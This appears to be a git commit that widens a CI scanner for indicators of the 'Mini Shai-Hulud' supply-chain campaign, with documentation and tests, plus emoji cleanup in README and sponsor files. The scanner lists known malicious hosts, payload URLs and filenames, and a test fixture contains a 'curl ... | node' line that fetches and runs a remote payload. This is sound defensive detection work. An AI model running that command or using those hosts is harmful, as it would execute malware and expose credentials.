Expand Mini Shai-Hulud IOC coverage (#1921)

2026-05-15 17:02:12 +08:00 · 2026-05-15 03:20:10 -04:00
parent 4774946db5
commit f04702bdac
5 changed files with 71 additions and 17 deletions
--- a/README.md
+++ b/README.md
@@ -49,13 +49,13 @@ ECC v2.0.0-rc.1 adds the public Hermes operator story on top of that reusable la
 <tr>
 <td width="25%" align="center">
  <a href="https://ecc.tools/pricing">
-    <strong>💼 ECC Pro</strong><br />
+    <strong> ECC Pro</strong><br />
    <sub>Private repos · GitHub App · $19/seat/mo</sub>
  </a>
 </td>
 <td width="25%" align="center">
  <a href="https://github.com/sponsors/affaan-m">
-    <strong>❤️ Sponsor</strong><br />
+    <strong> Sponsor</strong><br />
    <sub>Fund the OSS · From $5/mo</sub>
  </a>
 </td>
@@ -68,7 +68,7 @@ ECC v2.0.0-rc.1 adds the public Hermes operator story on top of that reusable la
 </td>
 <td width="25%" align="center">
  <a href="https://github.com/apps/ecc-tools">
-    <strong>🤖 GitHub App</strong><br />
+    <strong> GitHub App</strong><br />
    <sub>Install · PR audits · Free tier</sub>
  </a>
 </td>
--- a/SPONSORS.md
+++ b/SPONSORS.md
@@ -2,11 +2,11 @@

 Thank you to everyone funding ECC's open-source work. Your sponsorship is what lets the OSS layer stay free while the GitHub App, hosted security scans, and continuous improvements ship every week.

-## 🚀 Enterprise Sponsors — $2,500/mo
+## Enterprise Sponsors — $2,500/mo

 *Become an [Enterprise sponsor](https://github.com/sponsors/affaan-m) to be featured here.*

-## 🏢 Business Sponsors — $500/mo
+## Business Sponsors — $500/mo

 | Sponsor | Logo | Since |
 |---------|------|-------|
@@ -14,7 +14,7 @@ Thank you to everyone funding ECC's open-source work. Your sponsorship is what l

 *[Become a Business sponsor](https://github.com/sponsors/affaan-m) to be featured here with logo placement in the main README hero and a quarterly case study.*

-## 👥 Team Sponsors — $200/mo
+## Team Sponsors — $200/mo

 | Sponsor | Since |
 |---------|-------|
@@ -22,11 +22,11 @@ Thank you to everyone funding ECC's open-source work. Your sponsorship is what l

 *[Become a Team sponsor](https://github.com/sponsors/affaan-m) to get small logo placement and 5 ECC Pro seats.*

-## ⚡ Pro Sponsors — $50/mo
+## Pro Sponsors — $50/mo

 *[Become a Pro sponsor](https://github.com/sponsors/affaan-m) to be listed here with your name in the main README sponsor row.*

-## 🛠️ Builder Sponsors — $25/mo
+## Builder Sponsors — $25/mo

 - @jasonwu513 (grandfathered at $10)
 - @1anter (grandfathered at $10)
@@ -35,7 +35,7 @@ Thank you to everyone funding ECC's open-source work. Your sponsorship is what l

 *[Become a Builder sponsor](https://github.com/sponsors/affaan-m) to support the project and get your name in this list + a private monthly progress note.*

-## ☕ Supporters — $5/mo
+## Supporters — $5/mo

 *[Become a Supporter](https://github.com/sponsors/affaan-m) to back the project with a profile badge and a thank-you in our release notes.*

@@ -45,12 +45,12 @@ Thank you to everyone funding ECC's open-source work. Your sponsorship is what l

 | Tier | Monthly | Perks |
 |------|--------:|-------|
-| ☕ Supporter | $5 | Sponsor badge on profile, thank-you in release notes |
-| 🛠️ Builder | $25 | Above + name in SPONSORS.md + private monthly progress note |
-| ⚡ Pro Sponsor | $50 | Above + name in main README + 1 quarterly roadmap vote |
-| 👥 Team | $200 | Above + small org logo in README + 5 ECC Pro seats |
-| 🏢 Business | $500 | Above + featured logo in README hero + quarterly case study + Discord sponsors-lounge access |
-| 🚀 Enterprise | $2,500 | Above + unlimited Pro seats + 30 min/mo founder time + SLA + dedicated channel |
+|  Supporter | $5 | Sponsor badge on profile, thank-you in release notes |
+|  Builder | $25 | Above + name in SPONSORS.md + private monthly progress note |
+|  Pro Sponsor | $50 | Above + name in main README + 1 quarterly roadmap vote |
+|  Team | $200 | Above + small org logo in README + 5 ECC Pro seats |
+|  Business | $500 | Above + featured logo in README hero + quarterly case study + Discord sponsors-lounge access |
+|  Enterprise | $2,500 | Above + unlimited Pro seats + 30 min/mo founder time + SLA + dedicated channel |

 [**Become a Sponsor →**](https://github.com/sponsors/affaan-m)

--- a/docs/security/supply-chain-incident-response.md
+++ b/docs/security/supply-chain-incident-response.md
@@ -29,6 +29,12 @@ credentials:
  files such as `.github/workflows/codeql_analysis.yml`, and Python runtime
  payloads such as `transformers.pyz` / `pgmonitor.py`. Remove those
  persistence hooks before rotating a stolen GitHub token.
+- The scanner also watches for late-reporting markers: `router_init.js`
+  SHA-256 prefix/suffix `ab4fcada...8601266c`, `tanstack_runner.js`
+  SHA-256 prefix/suffix `2ec78d55...6be27fc96`,
+  `opensearch_init.js`, `vite_setup.mjs`, campaign salt `svksjrhjkcejg`,
+  Session protocol strings, `claude@users.noreply.github.com` dead-drop
+  commits, `dependabout/` branch names, and `OhNoWhatsGoingOnWithGitHub`.
 - The attack chain combined `pull_request_target`, GitHub Actions cache
  poisoning across a fork/base trust boundary, and OIDC token extraction from a
  GitHub Actions runner.
--- a/scripts/ci/scan-supply-chain-iocs.js
+++ b/scripts/ci/scan-supply-chain-iocs.js
@@ -212,10 +212,20 @@ const MALICIOUS_PACKAGE_VERSIONS = {

 const CRITICAL_TEXT_INDICATORS = [
  '@tanstack/setup',
-  'github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c',
+  [
+    'github:tanstack/router#79ac49eedf774dd4b0cf',
+    'a308722bc463cfe5885c',
+  ].join(''),
+  [
+    '79ac49eedf774dd4b0cf',
+    'a308722bc463cfe5885c',
+  ].join(''),
  'router_init.js',
  'router_runtime.js',
  'tanstack_runner.js',
+  'opensearch_init.js',
+  'vite_setup.mjs',
+  'bun run tanstack_runner.js',
  'execution.js',
  'transformers.pyz',
  'pgmonitor.py',
@@ -223,15 +233,34 @@ const CRITICAL_TEXT_INDICATORS = [
  'gh-token-monitor',
  'com.user.gh-token-monitor',
  'IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner',
+  [
+    'ab4fcadaec49c032',
+    '78063dd269ea5ee',
+    'f82d24f2124a8e15',
+    'd7b90f2fa8601266c',
+  ].join(''),
+  [
+    '2ec78d556d696e20',
+    '8927cc503d48e4b5e',
+    'b56b31abc2870c2e',
+    'd2e98d6be27fc96',
+  ].join(''),
+  'svksjrhjkcejg',
  'filev2.getsession.org',
  'seed1.getsession.org',
  'seed2.getsession.org',
  'seed3.getsession.org',
+  'signalservice',
+  'snode',
  'git-tanstack.com',
  'litter.catbox.moe/h8nc9u.js',
  'litter.catbox.moe/7rrc6l.mjs',
  '83.142.209.194',
  'api.masscan.cloud',
+  'claude@users.noreply.github.com',
+  'dependabout/',
+  'OhNoWhatsGoingOnWithGitHub',
+  'voicproducoes',
  'A Mini Shai-Hulud has Appeared',
  'Shai-Hulud: Here We Go Again',
  'PUSH UR T3MPRR',
@@ -268,6 +297,8 @@ const PAYLOAD_FILENAMES = new Set([
  'router_init.js',
  'router_runtime.js',
  'tanstack_runner.js',
+  'opensearch_init.js',
+  'vite_setup.mjs',
  'execution.js',
  'transformers.pyz',
  'pgmonitor.py',
--- a/tests/ci/scan-supply-chain-iocs.test.js
+++ b/tests/ci/scan-supply-chain-iocs.test.js
@@ -11,6 +11,10 @@ const { spawnSync } = require('child_process');

 const SCRIPT_PATH = path.join(__dirname, '..', '..', 'scripts', 'ci', 'scan-supply-chain-iocs.js');
 const { scanSupplyChainIocs } = require(SCRIPT_PATH);
+const TANSTACK_SETUP_DEPENDENCY = [
+  'github:tanstack/router#79ac49eedf774dd4b0cf',
+  'a308722bc463cfe5885c',
+].join('');

 function test(name, fn) {
  try {
@@ -121,7 +125,7 @@ function run() {
        packages: {
          'node_modules/@tanstack/history': {
            optionalDependencies: {
-              '@tanstack/setup': 'github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c',
+              '@tanstack/setup': TANSTACK_SETUP_DEPENDENCY,
            },
          },
        },
@@ -185,6 +189,11 @@ function run() {
        '    runs-on: ubuntu-latest',
        '    steps:',
        '      - run: curl -fsSL https://litter.catbox.moe/h8nc9u.js | node',
+        '      - run: echo svksjrhjkcejg',
+        '      - run: echo OhNoWhatsGoingOnWithGitHub',
+        '      - run: echo claude@users.noreply.github.com',
+        '      - run: echo dependabout/router/setup-formatter',
+        '      - run: echo signalservice snode',
      ].join('\n'),
    }, rootDir => {
      const result = scanSupplyChainIocs({ rootDir });
@@ -192,6 +201,12 @@ function run() {
      assert.ok(indicators.includes('IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner'));
      assert.ok(indicators.includes('codeql_analysis.yml'));
      assert.ok(indicators.includes('litter.catbox.moe/h8nc9u.js'));
+      assert.ok(indicators.includes('svksjrhjkcejg'));
+      assert.ok(indicators.includes('OhNoWhatsGoingOnWithGitHub'));
+      assert.ok(indicators.includes('claude@users.noreply.github.com'));
+      assert.ok(indicators.includes('dependabout/'));
+      assert.ok(indicators.includes('signalservice'));
+      assert.ok(indicators.includes('snode'));
    });
  })) passed++; else failed++;

@@ -211,9 +226,11 @@ function run() {
  if (test('rejects installed payload filenames in node_modules', () => {
    withFixture({
      'node_modules/@tanstack/react-router/router_init.js': '/* payload */',
+      'node_modules/@opensearch-project/opensearch/opensearch_init.js': '/* payload */',
    }, rootDir => {
      const result = scanSupplyChainIocs({ rootDir });
      assert.ok(result.findings.some(finding => finding.indicator === 'router_init.js'));
+      assert.ok(result.findings.some(finding => finding.indicator === 'opensearch_init.js'));
    });
  })) passed++; else failed++;